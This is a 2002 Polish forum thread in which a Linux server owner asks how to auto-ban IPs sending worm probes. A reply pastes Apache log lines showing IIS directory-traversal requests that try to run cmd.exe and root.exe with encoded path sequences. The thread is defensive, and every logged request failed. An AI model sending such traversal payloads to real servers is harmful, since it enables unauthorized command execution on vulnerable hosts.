Freesco, NND, CDN, EOS

http://www.freesco.pl
Dzisiaj jest sobota, 2 sierpnia 2025, 05:37

Strefa czasowa UTC+2godz.




Nowy temat Odpowiedz w temacie  [ Posty: 2 ] 
Autor Wiadomość
Post: sobota, 9 listopada 2002, 19:28 
Offline
Użytkownik

Rejestracja: wtorek, 15 października 2002, 16:23
Posty: 117
Lokalizacja: Krakow
Jakims wspanialym sposobem wirusy napisane dla Windows NT zwiedzialy sie ze mam server w sieci i regularnie go inwigiluja. Nie sa to ip z sieci wewnetrznej, ale z roznych domen (np. nazwa.de nazwa.ch nazwa.com) .
Takie mile wiruski probuja dostac sie do katalogu system , system32, scripts, etc. Prawie kazdy chce dorwac plik cmd.exe (odpowiednikiem w ms-dos jest chyba command.com) tyle ze to linux i nie ma ani katalogow, ani cmd.exe.


W zasadzie to niewiele moga zwojowac, ale wydaje mi sie ze przez dobijanie sie co 10 sekund z roznych ip znacznie obnizaja wydajnosc mojego serwera i zasmiecaja mi logi systemu.

Dlatego zaczalem dodawac ip z ktorych wirusy atakuja do banlist.cfg

Niestety problem jest taki : (wreszcie plenta) :D
ze po zablokowaniu jednego Ip po jakims czasie z innego wirus znow zaczyna atakowac.

MOzna napisac skrypt ktory bedzie sam dodawal ip do banlist.cfg, jak odkryje np. ze z ip 80.80.34.15 ktos chcial wykonac katalog system albo pobrac plik cmd.exe

Ktos juz sie z tym bawil? Jest cos podobnego opisane? Ktos napisal taki scrypt?

_________________
---------------
Best regards

C-O-N


Na górę
 Wyświetl profil  
 
 Tytuł:
Post: sobota, 9 listopada 2002, 21:49 
: [/] [] ()
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3670
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3670
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670


Olewaj wszystkie wpisu tego typu,
niestety zasmiecaja logi rowno,
a z ta wydajnoscia to tez bez przesady, najwyzej transfer spadnie ci do 9kB/s
Skrypt tez mozna napisac (ale to on bedzie dodatkowo mulil serwer),
a i przypadkiem mozesz zbanowac najlepszego kumpla z komuterem i >> NT

Niestety logi zostaja najlepiej wylaczyc Apacha (czy co tam kto uzywa).


Na górę
  
 
Wyświetl posty nie starsze niż:  Sortuj wg  
Nowy temat Odpowiedz w temacie  [ Posty: 2 ] 

Strefa czasowa UTC+2godz.


Kto jest online

Użytkownicy przeglądający to forum: Obecnie na forum nie ma żadnego zarejestrowanego użytkownika i 7 gości


Nie możesz tworzyć nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz dodawać załączników

Szukaj:
Przejdź do:  
cron
Technologię dostarcza phpBB® Forum Software © phpBB Group
Hosting: Compus-Net
RobertKonik.pl